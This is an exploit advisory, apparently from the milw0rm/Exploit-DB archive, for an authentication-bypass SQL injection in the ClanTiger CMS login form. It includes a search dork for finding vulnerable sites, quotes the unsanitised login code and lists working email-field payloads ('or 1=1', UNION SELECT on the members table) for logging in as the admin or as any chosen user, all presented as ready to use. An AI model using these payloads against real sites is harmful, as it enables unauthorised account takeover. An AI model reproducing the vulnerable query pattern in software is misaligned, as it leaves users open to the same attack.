ClanTiger <= 1.1.1 Auth Bypass SQL Injection Vulnerability

2009-04-17T00:00:00
ID EDB-ID:8472
Type exploitdb
Reporter YEnH4ckEr
Modified 2009-04-17T00:00:00

Description

ClanTiger <= 1.1.1 (Auth Bypass) SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][&gt;  []     []  [][  ][]     []   [][]]  []  [&gt;  [][][][&gt;  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
   [&gt;  [][][][]  [][][][&gt;  [] []  []   []  []   [][]  []       [][]    [][][][&gt;  []    []    **
**  [-----[]-----[][][][&gt;--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][&gt;--[][][][]---\ 
**==[&gt;    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  &gt;&gt;--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [&gt;   [[[]]]   [][][][&gt;  [][]   [] [][[] [[]]  [][]  [][][]  []  [&gt;  [][][][&gt; &lt;][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	    	AUTH BYPASS LOGIN FORM (SQL INJECTION)	         	     |
|--------------------------------------------------------------------------------------------|
|                         	     | CLAN TIGER CMS |		 			     |
|  CMS INFORMATION:		      ----------------					     |
|										             |
|--&gt;WEB: http://www.clantiger.com				   		             |
|--&gt;DOWNLOAD: http://www.clantiger.com/download-clan-cms 	   		             |
|--&gt;DEMO: http://www.demo.clantiger.com/						     |
|--&gt;CATEGORY: CMS / Portals								     |
|--&gt;DESCRIPTION: ClanTiger is a content management system specifically designed for gaiming  |
| 		clans...								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|--&gt;TESTED ON: firefox 2.0.0.20 and IE 7.0.5730 (Default)				     |
|--&gt;DORK: "Powered by ClanTiger"							     |
|--&gt;CATEGORY: SQL INJECTION/ AUTH BYPASS						     |
|--&gt;AFFECT VERSION: LAST = 1.1.1 (1.1 too)						     |
|--&gt;Discovered Bug date: 2009-04-11							     |
|--&gt;Reported Bug date: 2009-04-11							     |
|--&gt;Fixed bug date: Not fixed								     |
|--&gt;Info patch (????): Not fixed							     |
|--&gt;Author: YEnH4ckEr									     |
|--&gt;mail: y3nh4ck3r[at]gmail[dot]com							     |
|--&gt;WEB/BLOG: N/A									     |
|--&gt;COMMENT: A mi novia Marijose...hermano,cuñada, padres (y amigos xD) por su apoyo.        |
----------------------------------------------------------------------------------------------

-----------
BUG FILE:
-----------

Path --&gt; [HOME_PATH]/module/login.php

It contents:

	function authenticate()
	{
		
		$authentication = $this-&gt;access-&gt;authenticate($_POST['email'],$_POST['password'],(bool) $_POST['stayLogged']);
		if($authentication === true)
		{
			header('Location: index.php?info=hasLoggedIn');
			exit;
		}

		// we couldn't log in
		$this-&gt;errorMessages[] = $authentication;
		$this-&gt;main();		
		
	}

Path --&gt; [HOME_PATH]/function/class.accesscontrol.php

It contents:

public function authenticate($email,$password,$stayAuthed=false)
	{
		
		if($stayAuthed) $logintime = time() + (3600*24*356*3);
		else $logintime = time() + 3600;
		
		// attempt to get the user from the database
		include ROOTPATH . 'base/class.user.php';
		$user = new User;
		$user-&gt;email = $email;
		$user-&gt;password = md5($password);
		$user-&gt;getBy(array('email','password'));
		...
				
	}	

------------
CONDITIONS:
------------

**gpc_magic_quotes=off

----------------------------------
PROOF OF CONCEPT (SQL INJECTION):
----------------------------------

[HOME_PATH]/index.php?module=login

login form:

e-mail value: something' [SQL]
password value: something //it is not used

---------
EXAMPLE:
---------

login post form:

e-mail value: something' or 1=1 /* --&gt; we are admin!
e-mail value: something' or 1   #  --&gt; we are admin!

Note: Now, we need DB_PREFIX (default: "", others: db_, clan_, etc)

e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=1 /*--&gt;admin (if id=1)!
e-mail value: something' AND 0 UNION ALL SELECT * FROM members WHERE id=12 /* --&gt;we are user id=12! 

*******************************************************************
 ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!
*******************************************************************
-------------------------------------------------------------------
*******************************************************************
 GREETZ TO: JosS and all spanish Hack3Rs community!
*******************************************************************

-------------------EOF----------------------------------&gt;&gt;&gt;ENJOY IT!

# milw0rm.com [2009-04-17]